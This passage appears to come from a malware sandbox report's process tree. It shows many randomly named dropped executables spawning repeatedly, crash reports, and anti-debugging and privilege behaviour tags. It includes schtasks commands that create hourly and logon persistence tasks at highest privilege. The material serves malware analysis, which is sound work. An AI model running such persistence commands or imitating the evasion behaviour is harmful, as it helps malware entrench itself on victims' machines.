        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:27592
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:28540
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:20688
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 20688 -s 28
        13⤵
        Program crash
        
        PID:14980
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:24396
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:22212
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 22212 -s 28
        13⤵
        Program crash
        
        PID:25468
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:23188
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:10936
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:22116
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:21596
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:28884
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:29120
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:29148
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:14688
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:27948
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:24672
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:19396
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:19952
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:23468
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:27324
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:30588
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:26100
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:23360
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:30056
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:26212
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:29936
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:24984
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:20224
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:24868
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:13196
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:26440
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:22840
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:30840
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:30200
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 30200 -s 32
        13⤵
        Program crash
        
        PID:31696
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:27668
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:24484
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:32248
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:31008
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:32212
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:29960
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:30832
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:22396
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:5268
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:32680
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:33000
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:19544
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:11904
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:33692
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:16712
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15116
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:8240
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:34036
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:28212
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:34436
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:29716
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:33468
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:33076
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:28604
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:34864
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:35248
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:22516
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:35020
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:32480
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:31860
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:33544
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:5764
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:15720
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:36600
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:31800
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:412
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:27892
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:26352
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        
        C:\Users\Admin\Documents\sNOldKfrjNE4mmfOTLZWB4RK.exe
        12⤵
        
        PID:12516
        
        C:\Users\Admin\Documents\9ZYMXQj8c7cYofKmgqeZQscL.exe
        
        "C:\Users\Admin\Documents\9ZYMXQj8c7cYofKmgqeZQscL.exe"
        11⤵
        
        PID:5288
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 304
        12⤵
        Program crash
        
        PID:7164
        
        C:\Users\Admin\Documents\aM0E57XHzxBPiX5VujPMoel_.exe
        
        "C:\Users\Admin\Documents\aM0E57XHzxBPiX5VujPMoel_.exe"
        11⤵
        
        PID:5296
        
        C:\Users\Admin\Documents\p72TgwrSQJdXJf3NbR88XcOr.exe
        
        "C:\Users\Admin\Documents\p72TgwrSQJdXJf3NbR88XcOr.exe"
        11⤵
        
        PID:5468
        
        C:\Users\Admin\Documents\mmOry7dBfMvTPXLUeFEPMn9_.exe
        
        "C:\Users\Admin\Documents\mmOry7dBfMvTPXLUeFEPMn9_.exe"
        11⤵
        
        PID:1860
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 280
        12⤵
        Program crash
        
        PID:5860
        
        C:\Users\Admin\Documents\5lf4wMbH4mC3Lxf2JAoQ37rC.exe
        
        "C:\Users\Admin\Documents\5lf4wMbH4mC3Lxf2JAoQ37rC.exe"
        11⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6052
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 244
        12⤵
        Program crash
        
        PID:6652
        
        C:\Users\Admin\Documents\NfEHxrua3rTWP_tJEVVj_yAU.exe
        
        "C:\Users\Admin\Documents\NfEHxrua3rTWP_tJEVVj_yAU.exe"
        11⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        12⤵
        Creates scheduled task(s)
        
        PID:1180
        
        C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
        
        "C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"
        12⤵
        
        PID:2608
        
        C:\Users\Admin\Documents\M19r2XX9I3QptT4_h3UjaQLV.exe
        
        "C:\Users\Admin\Documents\M19r2XX9I3QptT4_h3UjaQLV.exe"
        13⤵
        
        PID:6344
        
        C:\Users\Admin\AppData\Roaming\8456642.exe
        
        "C:\Users\Admin\AppData\Roaming\8456642.exe"
        14⤵
        
        PID:8268
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 8268 -s 2180
        15⤵
        Program crash
        
        PID:26656
        
        C:\Users\Admin\AppData\Roaming\1417004.exe
        
        "C:\Users\Admin\AppData\Roaming\1417004.exe"
        14⤵
        
        PID:9052
        
        C:\Users\Admin\AppData\Roaming\8387600.exe
        
        "C:\Users\Admin\AppData\Roaming\8387600.exe"
        14⤵
        
        PID:9196
        
        C:\Users\Admin\AppData\Roaming\3816529.exe
        
        "C:\Users\Admin\AppData\Roaming\3816529.exe"
        14⤵
        
        PID:7280
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 2240
        15⤵
        Program crash
        
        PID:24100
        
        C:\Users\Admin\Documents\5CaFX5G3LWOsJ9nhFxB5BqJv.exe
        
        "C:\Users\Admin\Documents\5CaFX5G3LWOsJ9nhFxB5BqJv.exe"
        13⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 280
        14⤵
        Program crash
        
        PID:9876
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        12⤵
        Creates scheduled task(s)
        
        PID:6500
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        "C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe"
        11⤵
        
        PID:3160
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:6912
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:6492
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:3548
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:3436
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:6328
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:1304
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:7896
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:7760
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:1256
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:4784
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:4652
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:5644
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:8932
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:2612
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9160
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:4084
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9556
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:10060
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9804
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:7572
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:2432
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9492
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9048
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:7532
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:3972
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:10288
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:10940
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:10508
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:11076
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:3504
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:11144
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:11828
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:12212
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:11752
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9608
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:7676
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:2268
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:6088
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:10612
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:2468
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:10648
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:13280
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:12380
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:11564
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:9268
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:8104
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:13176
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:14068
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:6276
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        
        C:\Users\Admin\Documents\N7ZrGHP20fmHvuKzPAPhMF87.exe
        12⤵
        
        PID:13380
        
